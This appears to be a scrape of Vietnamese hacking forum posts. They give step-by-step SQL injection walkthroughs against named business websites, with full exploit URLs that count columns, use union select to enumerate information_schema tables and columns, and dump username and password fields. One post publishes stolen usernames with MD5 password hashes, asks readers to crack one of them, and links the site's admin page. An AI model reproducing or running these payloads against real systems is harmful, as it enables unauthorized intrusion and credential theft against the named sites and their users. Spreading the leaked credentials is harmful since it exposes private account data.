và nó đây
Quote:
100, 102, 95, 117, 115, 101, 114
giờ tìm colum_name
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90%20union%20select%201,column_name,3%20from% 20information_schema.columns%20where%20table_name= %20char(100,%20102,%2095,%20117,%20115,%20101,%201 14)%20--
Điện thoại vỏ gỗ-Mobiado
user_id
user_name
user_password
user_regdate
giờ lấy thông tin thôi
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 union select 1,concat(user_name,char(47),user_password ),3 from df_user --
char(58) = dấu /
kết quả
acc/pass
winman/14ddd4dd79acd79cf361b4b384e40c7d
acc/pass
guest/e10adc3949ba59abbe56e057f20f883e
nhìn cái pass e10adc3949ba59abbe56e057f20f883e quen quen nó là 123456
còn cái 14ddd4dd79acd79cf361b4b384e40c7d em đã thử dùng gdataonlin.com nhưng không được
anh nào crack được pass thì cho em biết với nhé
link admin:
http://diemsangviet.net/admin
url: http://ddcntt.vn/forum/archive/index.php/t-1466.html
Hack site Toàn Thắng - sql injection
Hack site Toàn Thắng - sql injection
Victim :
http://www.toanthangsteel.com.vn/
Link khai thác
http://www.toanthangsteel.com.vn/vn/...n.php?tinID=35'
Có lỗi rồi đó, nhưng check lại xem khai thác được không nào ??
Sẽ đc trả về giá trị true
Sẽ đc trả về giá trị false.
OK
ngon rồi. Bắt đầu nào
Bây giờ làm gì nhỉ ? Đếm column = order by
Nếu hiển thị thông tin ở dưới thì là true, còn không có gì là false. Mình đang đi tìm giá trị false để xem column cuối cùng là bao nhiu. Ở đây mình tìm đc là 7
Bạn thử order by là 8 coi, lập tức sẽ hiển thị thông tin false liền 
Đếm xong rồi thì chỉ việc điền vào thôi
Ủa ?? đúng column rồi mà ?? Sao không có số nào hết vậy kà thay 35 = null xem nào 
Thấy số 4 không nào ?? thay 4 = version() để check xem nó dùng version bao nhiu nhé
Ta đc 5.0.51a-community úi mừng quá 
khỏi phải mò table_name
Lấy table_name nào
Ủa ?? Sao ra có 1 table vậy trời kì vậy ?? sai gì chăng ?? Chợt nhớ lại cái tuts của sis hoangduye ( 100% girl luôn nà anh em mau nhào vô đê )
trường hợp chỉ hiển thị 1 table đầu tiên, thì dùng limit
limit 0,1 > table thứ 1
limit 1,1 > table thứ 2
limit 2,1 > table thứ 3
limit n,1 > table thứ n
Như vậy câu khai thác sẽ là
Các bạn thử lần lượt, chừng nào có những table mình cần là đc. Ví dụ như admin, users ...
Ở đây mình đã tìm đc rồi, table users limit 31,1 <~ điên luôn
Có table rồi, bây giờ sẽ lấy column ở table users. Nhưng bằng cách nào ?? sis hoangduye đã có tuts rồi kìa 
convert table users sang ASCII
Web : http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
Sau khi convert thì thay vào câu lệnh để query.
Đó ... lại hiển thị 1 column nữa Sao mình ghét thế nhể .. lại mò nữa
Okie có rồi : Username và Pass oh yeah nó đây
Có đầy đủ table_name + column_name rồi ta chỉ việc thay vào.
concat() <~ hic chả hiểu câu này có nghĩa gì, nhìn mà dị ứng
Link admin các bạn tự tìm nhé
P/s : Nếu cảm thấy bài viết này có ích, sau khi vào đc admincp thì đừng edit bất cứ cái gì vào nghía cái rồi ra đc rồi
url:http://danviet.biz/forum/showthread.php?t=725
http://www.toanthangsteel.com.vn/
Link khai thác
http://www.toanthangsteel.com.vn/vn/...n.php?tinID=35'
Có lỗi rồi đó, nhưng check lại xem khai thác được không nào ??
Code:
http://www.toanthangsteel.com.vn/vn/progress/chitiettin.php?tinID=35 and 1=1--
Code:
http://www.toanthangsteel.com.vn/vn/progress/chitiettin.php?tinID=35 and 1=0--
OK
ngon rồi. Bắt đầu nàoBây giờ làm gì nhỉ ? Đếm column = order by
Code:
http://www.toanthangsteel.com.vn/vn/progress/chitiettin.php?tinID=35 order by 1--
Code:
http://www.toanthangsteel.com.vn/vn/progress/chitiettin.php?tinID=35 order by 7--
Đếm xong rồi thì chỉ việc điền vào thôi
Code:
http://www.toanthangsteel.com.vn/vn/progress/chitiettin.php?tinID=35 union select 1,2,3,4,5,6,7--
thay 35 = null xem nào Code:
http://www.toanthangsteel.com.vn/vn/progress/chitiettin.php?tinID=null union select 1,2,3,4,5,6,7--
Code:
http://www.toanthangsteel.com.vn/vn/progress/chitiettin.php?tinID=null union select 1,2,3,version(),5,6,7--
úi mừng quá khỏi phải mò table_nameLấy table_name nào
Code:
http://www.toanthangsteel.com.vn/vn/progress/chitiettin.php?tinID=null union select 1,2,3,table_name,5,6,7 from information_schema.tables--
kì vậy ?? sai gì chăng ?? Chợt nhớ lại cái tuts của sis hoangduye ( 100% girl luôn nà anh em mau nhào vô đê )trường hợp chỉ hiển thị 1 table đầu tiên, thì dùng limit
limit 0,1 > table thứ 1
limit 1,1 > table thứ 2
limit 2,1 > table thứ 3
limit n,1 > table thứ n
Như vậy câu khai thác sẽ là
Code:
http://www.toanthangsteel.com.vn/vn/progress/chitiettin.php?tinID=null union select 1,2,3,table_name,5,6,7 from information_schema.tables limit 0,1--
Ở đây mình đã tìm đc rồi, table users limit 31,1 <~ điên luôn
Code:
http://www.toanthangsteel.com.vn/vn/progress/chitiettin.php?tinID=null union select 1,2,3,table_name,5,6,7 from information_schema.tables limit 31,1--
convert table users sang ASCII
Web : http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
Sau khi convert thì thay vào câu lệnh để query.
Code:
http://www.toanthangsteel.com.vn/vn/progress/chitiettin.php?tinID=null union select 1,2,3,column_name,5,6,7 from information_schema.columns where table_name= char(117, 115, 101, 114, 115) limit 0,1--
Sao mình ghét thế nhể .. lại mò nữaOkie có rồi : Username và Pass
oh yeah nó đâyCó đầy đủ table_name + column_name rồi ta chỉ việc thay vào.
Code:
http://www.toanthangsteel.com.vn/vn/progress/chitiettin.php?tinID=null union select 1,2,3,concat(Username,char(58),Pass),5,6,7 from users--
Link admin các bạn tự tìm nhé
P/s : Nếu cảm thấy bài viết này có ích, sau khi vào đc admincp thì đừng edit bất cứ cái gì
vào nghía cái rồi ra đc rồi url:http://danviet.biz/forum/showthread.php?t=725
Subscribe to:
Posts (Atom)